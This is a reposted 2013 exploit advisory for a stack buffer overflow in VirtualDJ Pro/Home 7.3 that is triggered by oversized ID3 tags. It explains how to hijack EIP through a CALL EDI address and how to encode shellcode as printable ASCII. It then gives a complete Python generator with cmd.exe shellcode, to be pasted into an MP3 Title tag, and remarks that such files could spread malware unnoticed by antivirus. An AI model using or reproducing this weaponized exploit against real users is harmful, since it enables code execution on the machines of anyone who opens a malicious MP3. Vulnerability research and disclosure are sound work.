首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
VirtualDJ Pro/Home <=7.3 Buffer Overflow Vulnerability
来源:functionmixer.blogspot.com 作者:Alexandro 发布时间:2013-04-08  

# Exploit Title: VirtualDJ Pro/Home <=7.3 Buffer Overflow Vulnerability
# Date: 23.03.2013
# Exploit Author: Alexandro Sánchez Bach (functionmixer.blogspot.com)
# Vendor Homepage: http://www.virtualdj.com/
# Software Link: http://www.filehippo.com/en/download_virtualdj/14361/
# Version: VirtualDJ Pro/Home 7.3
# Tested on: Windows XP SP3


# Demo: http://www.youtube.com/watch?v=PJeaWqMJRm0
# Description:

When the user enters a folder, VirtualDJ tries to retrieve all information
from the ID3 tags of MP3 files inside such as �Title�, �Album�, and
�Artist� and stores it in a buffer. After that, a second buffer of length
4100 is allocated in the stack and only the characters A-Z from the first
buffer will be copied to it. According to the ID3 v2.x standard, these tags
can have length greater than 4100; therefore it is possible to produce a
buffer overflow in this second buffer. At the time when the buffer overflow
happens and the program reaches the RETN instruction, the EDI register
points to the first buffer.


We cannot assign the EIP the address of the first buffer directly since it
contains characters which are not in range A-Z. However if we take into
account the previous information, we can do this indirectly: We can set the
bytes of the title 4100:4104 = "FSFD". After the buffer overflows occurs we
get EIP = "FSFD" = 0x44465346. At this address (inside urlmon.dll) we find
a "CALL EDI" instruction and so the bytes in the first buffer will be
executed. Now we face another problem. VirtualDJ has inserted a "C3" byte
(RETN) before each non-printable ASCII character in the first buffer and we
cannot execute the shellcode directly. We can solve this by pushing into
the stack the bytes of the shellcode using only printable ASCII characters.
Let me explain:


Instead of pushing the bytes 0xB8, 0xFF, 0xEF, 0xFF (68FFEFFFB8) directly,
we can do exactly the same using only printable ASCII characters
(�%@@@@%????-R@D@-R@D@-R@D@-R?C?P�):

AND EAX, 40404040 //2540404040 == �%@@@@�
AND EAX, 3F3F3F3F //253F3F3F3F == �%????� <-- EAX = 0
SUB EAX, 40444052 //2D40444052 == �-R@D@�
SUB EAX, 40444052 //2D40444052 == �-R@D@�
SUB EAX, 40444052 //2D40444052 == �-R@D@�
SUB EAX, 3F433F52 //2D3F433F52 == �-R?C?� <-- EAX = FFEFFFB8
PUSH EAX // 50 == �P�

Once all the bytes of the shellcode are pushed into the stack (in inverse
order) we use PUSH ESP (0x54 == "T") and RETN (0xC3) to run the shellcode.
This time, it doesn't matter if VirtualDJ pushes another 0xC3 byte before
this one.


I think this is a pretty serious vulnerability since VirtualDJ is
considered the #1 software for mixing music with millions of downloads
around the world. By exploiting this vulnerability it would be possible to
spread quickly a malware just by uploading a malicious MP3 file in a
popular site. Even worse, I guess this file wouldn't be detected by any
antivirus. It should be also possible to "hide" the bytes of the exploit
behind the real title of the MP3 file and a lot of spaces. Because of that,
I hope they fix this as soon as possible.

#Exploit: VirtualDJ Pro/Home <=7.3 Buffer Overflow Vulnerability
#By: Alexandro Sánchez Bach | functionmixer.blogspot.com
#More info: http://www.youtube.com/watch?v=PJeaWqMJRm0

import string


def unicodeHex(c):
    c = hex(ord(c))[2:].upper()
    if len(c)==1:
        c = "0"+c
   
    return c+"00"


def movEAX(s):
    #Arrays
    s = map(ord, list(s))
    inst = []
    target = [512, 512, 512, 512]
    carry  = [0,-2,-2,-2]
    for i in range(4):
        if s[i] < 0x10:
            target[i] = 256
            if i < 3:
                carry[i+1] = -1
    diff = [target[b] - s[b] for b in range(4)]

    #Gen instructions
    for i in range(3):
        target = [target[b] - diff[b]/4 for b in range(4)]
        inst += [[diff[b]/4 for b in range(4)]]
    target = [target[b] - s[b] + carry[b] for b in range(4)]
    inst += [target]
   
    #Remove character '\'
    for b in range(4):
        if ord("[")  in [inst[i][b] for i in range(4)] or \
           ord("\\") in [inst[i][b] for i in range(4)] or \
           ord("]")  in [inst[i][b] for i in range(4)]:
            for i in range(4):
                inst[i][b] = inst[i][b]+5*((-1)**(i))
   
    inst  = ["\x2D"+"".join(map(chr, i)) for i in inst]
    return "".join(inst)


#Shellcode: Run cmd.exe
shellcode  = "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC"
shellcode += "\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45"
shellcode += "\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45"
shellcode += "\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45"
shellcode += "\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3"
retAddress = "\xED\x1E\x94\x7C" # JMP ESP ntdll.dll WinXP SP2
shellcode += retAddress

while len(shellcode) % 4 != 0:
    shellcode += '\x90'
   

exploit = ""
for i in range(0,len(shellcode),4)[::-1]:
    exploit += "\x25\x40\x40\x40\x40\x25\x3F\x3F\x3F\x3F"  #EAX = 0
    exploit += movEAX(shellcode[i:i+4])  #EAX = shellcode[i:i+4]
    exploit += "\x50"  #PUSH EAX
exploit += '\x54' #PUSH ESP
exploit += '\xC3' #RET


c = 0
for i in exploit:
    if i in string.ascii_letters:
        c+=1
exploit +=  "A"*(4100-c)
exploit += "FSFD"

print exploit
#Paste the generated code in the tag 'Title' of the MP3 file.


 
[推荐] [评论(1条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·HP System Management Homepage
·HexChat 2.9.4 Local Exploit Su
·Easy FTP Server 1.7.0.2 Denial
·Google AD Sync Tool Vulnerabil
·MediaMonkey Player v.4.0.7 Loc
·Sysax Multi Server 6.10 - SSH
·Personal File Share 1.0 DoS
·BigAnt Server 2.97 - DDNF User
·Easy DVD Player (libav) libavc
·Linksys WRT54GL apply.cgi Comm
·SmallFTPd 1.0.3 Denial Of Serv
·Adobe ColdFusion APSB13-03 Rem
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved